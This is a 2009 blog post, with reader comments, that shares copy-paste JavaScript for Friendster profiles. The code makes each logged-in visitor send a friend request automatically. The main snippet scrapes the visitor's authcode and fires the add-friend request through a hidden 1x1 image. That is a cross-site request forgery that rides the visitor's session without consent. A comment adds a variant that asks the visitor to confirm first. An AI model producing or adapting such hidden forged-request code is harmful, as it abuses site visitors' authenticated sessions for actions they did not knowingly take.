April 12, 2009
Auto Friend Adder – Faster&Secure (No Email)
Posted by: Joy : Category: JavaScript
What is Auto Friend Adder? It’s a javascript code to make the visitor of our friendster profile do the automatic request to add as a friend. Anyway, this one is another version of what exist before,
Why faster? As it doesnt use OnLoadHandler like another version
Why secure? As using lastname would really hide our email from spammer.
Code provided by : AdV & CdV
-
// AUTOMATIC FRIEND REQUEST
// Code Provided By : Crazy de Ville
var cpButton=$("controlPanelButtons").innerHTML;
if(pageViewerID!=""&&cpButton.indexOf("addfriendrequest")!=-1){
$("0").innerHTML+=""
+"<img src='http://www.friendster.com/addfriendrequest.php?authcode="
+cpButton.slice(cpButton.indexOf("authcode=")).slice(9,39)+"&uid="
+pageOwnerID+"&email=&firstname=&lastname=YOUR LAST NAME"
+"&friend=&submit=1' width=' 1' height=' 1' style='visibility:hidden'/>"
}
Change the blue part with your friendster lastname
Copy paste the code anywhere inside your JS external file, outside onloadhandler recommended for faster load ![]()
Happy tweaking












June 2nd, 2009 at 4:10 am
yang di comment#2, versi pake confirm di atas itu perlu ganti
YOUR_LAST_NAME sama lastname friendster kamu
klo mau yang copy paste, cobain yang ini :
// AUTOMATIC FRIEND REQUEST + CONFIRMATION
// Code Provided By : Crazy de Ville
var cpButton=$("controlPanelButtons").innerHTML;
if(pageViewerID!=""&&cpButton.indexOf("addfriendrequest")!=-1){
if(confirm("Lom jadi tmen neh, add gw yah?")){
var addfriend = $("0").getElementsByTagName("a");
for(x=0;x<addfriend.length;x++){
var a = addfriend[x].href;
if(a.indexOf("addfriend")!=-1){
$("0").innerHTML += "<img src='"+a+"&lastname="+pageOwnerFName+"&submit=1' width=' 1' height=' 1'/>"
}
}
}
}
June 8th, 2009 at 8:39 pm
gw mw add temen2 gw lebih banyak lagi…tapi kok ga bisa?mohon bantuannya….thanks before..
June 18th, 2009 at 5:23 pm
JS external file ..XN UN ?NEWBIE LAN
May 24th, 2010 at 8:19 am
Hi. this is kind of an “unconventional” question , but have other visitors asked you how get the menu bar to look like you’ve got it? I also have a blog and am really looking to alter around the theme, however am scared to death to mess with it for fear of the search engines punishing me. I am very new to all of this …so i am just not positive exactly how to try to to it all yet. I’ll just keep working on it one day at a time.